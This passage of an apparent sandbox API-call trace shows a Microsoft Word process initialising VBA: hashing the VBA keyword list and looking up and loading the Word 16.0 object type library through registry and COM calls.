(lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x6940000 [0017.026] VirtualAlloc (lpAddress=0x9170000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9170000 [0017.026] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0017.026] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0017.026] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0017.026] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0017.026] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0017.027] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0017.028] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0017.029] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0017.030] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0017.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0017.031] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x286960 | out: phkResult=0x286960*=0x9aa) returned 0x0 [0017.031] RegOpenKeyW (in: hKey=0x9aa, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x286958 | out: phkResult=0x286958*=0x9ae) returned 0x0 [0017.031] RegEnumKeyW (in: hKey=0x9ae, dwIndex=0x0, lpName=0x286988, cchName=0xa | out: lpName="8.7") returned 0x0 [0017.032] wcscpy_s (in: _Destination=0x286970, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0017.032] RegOpenKeyW (in: hKey=0x9ae, lpSubKey="8.7", phkResult=0x286a18 | out: phkResult=0x286a18*=0x9ba) returned 0x0 [0017.032] _ultoa_s (in: _Val=0x409, _DstBuf=0x286990, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0017.032] RegOpenKeyA (in: hKey=0x9ba, lpSubKey="409", phkResult=0x286980 | out: phkResult=0x286980*=0x0) returned 0x2 [0017.033] RegOpenKeyW (in: hKey=0x9c2, lpSubKey="win64", phkResult=0x286988 | out: phkResult=0x286988*=0x9ca) returned 0x0 [0017.033] RegCloseKey (hKey=0x9ca) returned 0x0 [0017.033] RegCloseKey (hKey=0x9c2) returned 0x0 [0017.033] _ultow_s (in: _Value=0x0, _Buffer=0x286a20, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0017.033] RegOpenKeyW (in: hKey=0x9ba, lpSubKey="0", phkResult=0x2869f8 | out: phkResult=0x2869f8*=0x9be) returned 0x0 [0017.033] RegQueryValueW (in: hKey=0x9be, lpSubKey="win64", lpData=0x286a40, lpcbData=0x2869f4 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x2869f4) returned 0x0 [0017.034] wcscpy_s (in: _Destination=0x286d70, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0017.034] RegCloseKey (hKey=0x9be) returned 0x0 [0017.034] RegCloseKey (hKey=0x9ba) returned 0x0 [0017.034] RegCloseKey (hKey=0x9ae) returned 0x0 [0017.034] RegCloseKey (hKey=0x9aa) returned 0x0 [0017.034] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x2869f8*=0x0 | out: pptlib=0x2869f8*=0x72e0930) returned 0x0 [0017.034] ITypeLib:RemoteGetDocumentation (in: This=0x72e0930, index=-1, refPtrFlags=0x286a18, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xa399f58 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xa399f58*="따߾") returned 0x0 [0017.034] IUnknown:QueryInterface (in: This=0x72e0930, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286808 | out: ppvObject=0x286808*=0x0) returned 0x80004002 [0017.034] ITypeLib:RemoteGetLibAttr (in: This=0x72e0930, ppTLibAttr=0x286800, pDummy=0x10 | out: ppTLibAttr=0x286800, pDummy=0x10) returned 0x0 [0017.034] ITypeLib:RemoteGetDocumentation (in: This=0x72e0930, index=-1, refPtrFlags=0x0, pbstrName=0x2867f8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7506f10 | out: pbstrName=0x2867f8*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7506f10) returned 0x0 [0017.034] StringFromGUID2 (in: rguid=0x7831c80*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x286820, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0017.034] _ultow_s (in: _Value=0x8, _Buffer=0x28676a, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0017.034] _ultow_s (in: _Value=0x7, _Buffer=0x28676e, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0017.034] _ultow_s (in: _Value=0x0, _Buffer=0x286772, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 